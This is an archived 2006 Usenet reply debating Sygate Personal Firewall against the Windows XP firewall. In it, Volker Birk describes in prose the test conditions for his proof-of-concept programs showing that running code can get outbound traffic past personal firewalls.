Re: Sygate Free PFW
- From: Volker Birk <bumens@xxxxxxxxxxx>
- Date: 12 Jun 2006 09:12:05 +0200
WinTerMiNator <me@xxxxxxxxxxx> wrote:
No. Keep Sygate PFW. Version 5.5 build 2710 preferrablyHowever, since the product is no longer updated, I wonder if it isYes.
still a valid solution since any recently discovered flaws or
security holes won't be fixed. Opinions? Is it a good idea to just
switch to the windows XP SP2 firewall?
How do you solve the mentioned security design flaws of Sygate?
First, Windows firewall does not inform user when an apps tries to connect
to internet: it knows to block only inbound connexions, not outbound ones.
Volker and his fellows will say you it is a good design choice!
Hm... at least I will, yes :-P
Even if this
was true, Windows firewall has definitely a big hole: when apps are
installing, they can add an exception and so allow an *inbound* connexion
without requesting user's authorization or even without informing him (her).
Yes. Don't install applications you cannot trust in.
For example, just try to install Skype 2.0, or any security product which
needs to connect to internet...
Yes. If the user installs this, usually she/he want's to use it. What's
wrong with it?
This arrives, of course, when app is installed in a session where user has
admin rights (note that almost all windows apps require an admin session to
be installed); it arrives also when app is installed invoking "runas", or
when app is launched using "Psexec" (an utility from Mark Russinovitch)
which gives the app the execution rights of "SYSTEM" user.
Yes. And if an application is installed using Administrator's rights,
no "Personal Firewall" can do anything against this, if the setup is
clever coded.
Of course, what legitimate apps can do, malware can also do. And several
malware can install themselves using Psexec or similar method and can have
so full access to add exceptions.
--> Windows firewall is not a firewall, it is like a sieve!
You have the same non-arguments as everyone else here, which tryed to
argue that way.
This is boring. Why you're totally wrong, everybody can read in older
postings in this group already. Always discussing the same?
If an application want's to communicate to the outside, it's no problem
to do so at all. Not only my own two PoC codes for that prove it.
However, among PFW's, Sygate PFW is probably, not the best, but the "least
bad".
I cannot see that. Sygate has bad security design flaws, which make a
PC more insecure and not more secure compared to the Windows-Firewall.
wants to connect is launched directly by user or launched by another app; in
the second case it will request user's authorization (here is one Volker's
proofs of concept defeated...).
It's not. You just don't understand, that my PoC code does not deal with
"how is it started". And it should not.
Why?
If Sygate would manage to prevent starting malware reliably, then all
other functionality of Sygate would be superfluous. The existance of
the functionality of wanting to "control outbound traffic" is the proof,
that Sygate themselves don't think that they can prevent starting
malware reliably. And they're right in this single point here, at least
malware sometimes is started by a fooled user, a victim of a social
engineering attack. So "how can it be prevented from being started"
is _not_ part of my PoC code.
I'm testing "how good is the 'Personal Firewall', if the code already
is running" case. If you want to test my PoC code, you have to start it
and let it running, assuming, that (if it would be malware, which it not
is) this problem is already solved. Then you can test with it the one
and only object it's developed for: if it manages to have outbound
communication in spite of your "Personal Firewall".
And the actual implementation has ambient conditions, you have to
implement, or you cannot use it for a test:
- you have to have a PC with Windows 2k or XP and a web-browser, which
is allowed to be used for browsing the web (for the test
implementation, only Internet Explorer and Mozilla Firefox 1.0.x are
supported, while it's easy to adapt to an arbitrary browser)
- for the second test, you have to have a PC with Windows 2k or XP and
activated Active Desktop, which may include web content
The first scenario I chose, because it's very common; most of the owners
of a "Personal Firewall" will have such a scenario.
The second scenario I chose, because it's the default configuration of
Windows and most of the "Personal Firewalls"; most of the owners of a
"Personal Firewall" will have such a scenario, too.
If you don't implement this ambient conditions in your testing
environment, then your tests are useless and pointless.
It also seems to be less targeted by malwares than Windows firewall.
No. Or: please give a proof.
Yours,
VB.
--
"If you want to play with a piece of windows software that makes you
click all over the place, there's always minesweeper."
Kyle Stedman about "Personal Firewalls" in c.s.f
.
- References:
- Sygate Free PFW
- From: Shadowman
- Re: Sygate Free PFW
- From: Volker Birk
- Re: Sygate Free PFW
- From: WinTerMiNator
- Sygate Free PFW
- Prev by Date: Re: What free software firewall to run?
- Next by Date: Re: What free software firewall to run?
- Previous by thread: Re: Sygate Free PFW
- Next by thread: where is my external dns ?
- Index(es):
Relevant Pages
|
